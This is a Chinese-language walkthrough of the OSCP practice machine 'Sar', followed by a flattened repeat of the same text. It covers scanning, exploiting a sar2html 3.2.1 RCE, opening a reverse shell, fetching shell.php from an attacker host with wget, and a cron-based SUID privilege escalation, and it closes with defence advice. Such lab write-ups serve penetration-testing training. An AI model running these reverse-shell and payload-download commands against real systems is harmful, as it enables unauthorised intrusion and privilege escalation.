OSCP PG—Sar
字数 1226 2025-08-10 14:13:03

OSCP PG—Sar 靶机渗透测试教学文档

0x01 靶机概述

Sar 是一台难度中等的 OSCP 练习靶机,主要涉及以下技术点:

  • Web 应用漏洞利用 (sar2html 3.2.1 RCE)
  • 反弹 Shell 技巧
  • 通过计划任务进行权限提升
  • SUID 提权技术

0x02 信息收集阶段

1. 端口扫描

使用 masscan 进行快速端口扫描:

masscan -p 0-65535 192.168.190.35 --rate=10000 -e tun0

发现开放端口:22(SSH)、80(HTTP)

使用 nmap 进行详细服务识别:

nmap -sV -sS -p 22,80 192.168.190.35

2. Web 应用枚举

访问 Web 站点:

  1. 检查 robots.txt 文件,发现隐藏目录 /sar2HTML
  2. 访问该目录获取后台版本信息:sar2html 3.2.1

0x03 漏洞利用

1. 搜索已知漏洞

使用 searchsploit 查找 sar2html 3.2.1 的已知漏洞:

searchsploit sar2html 3.2.1

发现存在远程代码执行(RCE)漏洞。

2. 获取并利用 EXP

  1. 获取利用脚本
  2. 执行系统命令确认漏洞存在

3. 反弹 Shell 技巧

初始反弹 Shell 尝试失败:

bash -c 'bash -i >& /dev/tcp/kali-ip/port 0>&1'

替代方案:

  1. 确认目标系统是否支持 wget
  2. 在攻击机上准备反弹 Shell 脚本 (shell.php)
  3. 启动 Python HTTP 服务:
python3 -m http.server 80
  1. 在目标系统上下载脚本:
wget 192.168.45.178/shell.php
  1. 使用 nc 监听反弹 Shell:
nc -lvnp 4444

0x04 权限提升

1. 初始权限确认

获取交互式 Shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现存在用户 love 的家目录,但无可利用文件。

2. 常规提权检查

检查以下内容未发现可利用点:

  • SUID 文件
  • Sudo 权限
  • 内核漏洞

3. 计划任务提权

/var/www/html 目录发现两个可疑文件:

  • finally.sh
  • write.sh

检查计划任务:

cat /etc/crontab

发现每5分钟执行一次 write.sh

利用方法:

  1. 修改 write.sh 内容:
echo "bash -c 'chmod u+s /bin/bash'" > write.sh
  1. 等待计划任务执行,为 /bin/bash 添加 SUID 权限
  2. 使用 SUID bash 提权:
/bin/bash -p

0x05 关键总结

  1. 信息收集要全面:robots.txt 常包含重要信息

  2. 已知漏洞利用:及时使用 searchsploit 搜索已知漏洞

  3. 反弹 Shell 技巧

    • 直接反弹失败时可尝试下载脚本方式
    • Python HTTP 服务是常用传输方法

  4. 提权路径

    • 检查 SUID、sudo 权限和计划任务是基本步骤
    • 计划任务提权是常见手法
    • SUID bash 提权简单有效

  5. 渗透测试流程

    信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 维持访问 → 清理痕迹

0x06 防御建议

  1. 针对 sar2html

    • 及时更新到最新版本
    • 限制不必要的 Web 应用目录访问

  2. 针对计划任务提权

    • 设置计划任务文件不可被普通用户修改
    • 使用最小权限原则执行计划任务

  3. 系统加固

    • 移除不必要的 SUID 权限
    • 定期审计系统权限设置

  4. 日志监控

    • 监控可疑的 Web 请求
    • 记录计划任务执行情况

通过此靶机练习,可以掌握从 Web 应用到系统提权的完整渗透流程,特别是计划任务和 SUID 提权的实际应用。

OSCP PG—Sar 靶机渗透测试教学文档 0x01 靶机概述 Sar 是一台难度中等的 OSCP 练习靶机,主要涉及以下技术点: Web 应用漏洞利用 (sar2html 3.2.1 RCE) 反弹 Shell 技巧 通过计划任务进行权限提升 SUID 提权技术 0x02 信息收集阶段 1. 端口扫描 使用 masscan 进行快速端口扫描: 发现开放端口:22(SSH)、80(HTTP) 使用 nmap 进行详细服务识别: 2. Web 应用枚举 访问 Web 站点: 检查 robots.txt 文件,发现隐藏目录 /sar2HTML 访问该目录获取后台版本信息:sar2html 3.2.1 0x03 漏洞利用 1. 搜索已知漏洞 使用 searchsploit 查找 sar2html 3.2.1 的已知漏洞: 发现存在远程代码执行(RCE)漏洞。 2. 获取并利用 EXP 获取利用脚本 执行系统命令确认漏洞存在 3. 反弹 Shell 技巧 初始反弹 Shell 尝试失败: 替代方案: 确认目标系统是否支持 wget 在攻击机上准备反弹 Shell 脚本 (shell.php) 启动 Python HTTP 服务: 在目标系统上下载脚本: 使用 nc 监听反弹 Shell: 0x04 权限提升 1. 初始权限确认 获取交互式 Shell: 发现存在用户 love 的家目录,但无可利用文件。 2. 常规提权检查 检查以下内容未发现可利用点: SUID 文件 Sudo 权限 内核漏洞 3. 计划任务提权 在 /var/www/html 目录发现两个可疑文件: finally.sh write.sh 检查计划任务: 发现每5分钟执行一次 write.sh 利用方法: 修改 write.sh 内容: 等待计划任务执行,为 /bin/bash 添加 SUID 权限 使用 SUID bash 提权: 0x05 关键总结 信息收集要全面 :robots.txt 常包含重要信息 已知漏洞利用 :及时使用 searchsploit 搜索已知漏洞 反弹 Shell 技巧 : 直接反弹失败时可尝试下载脚本方式 Python HTTP 服务是常用传输方法 提权路径 : 检查 SUID、sudo 权限和计划任务是基本步骤 计划任务提权是常见手法 SUID bash 提权简单有效 渗透测试流程 : 0x06 防御建议 针对 sar2html : 及时更新到最新版本 限制不必要的 Web 应用目录访问 针对计划任务提权 : 设置计划任务文件不可被普通用户修改 使用最小权限原则执行计划任务 系统加固 : 移除不必要的 SUID 权限 定期审计系统权限设置 日志监控 : 监控可疑的 Web 请求 记录计划任务执行情况 通过此靶机练习,可以掌握从 Web 应用到系统提权的完整渗透流程,特别是计划任务和 SUID 提权的实际应用。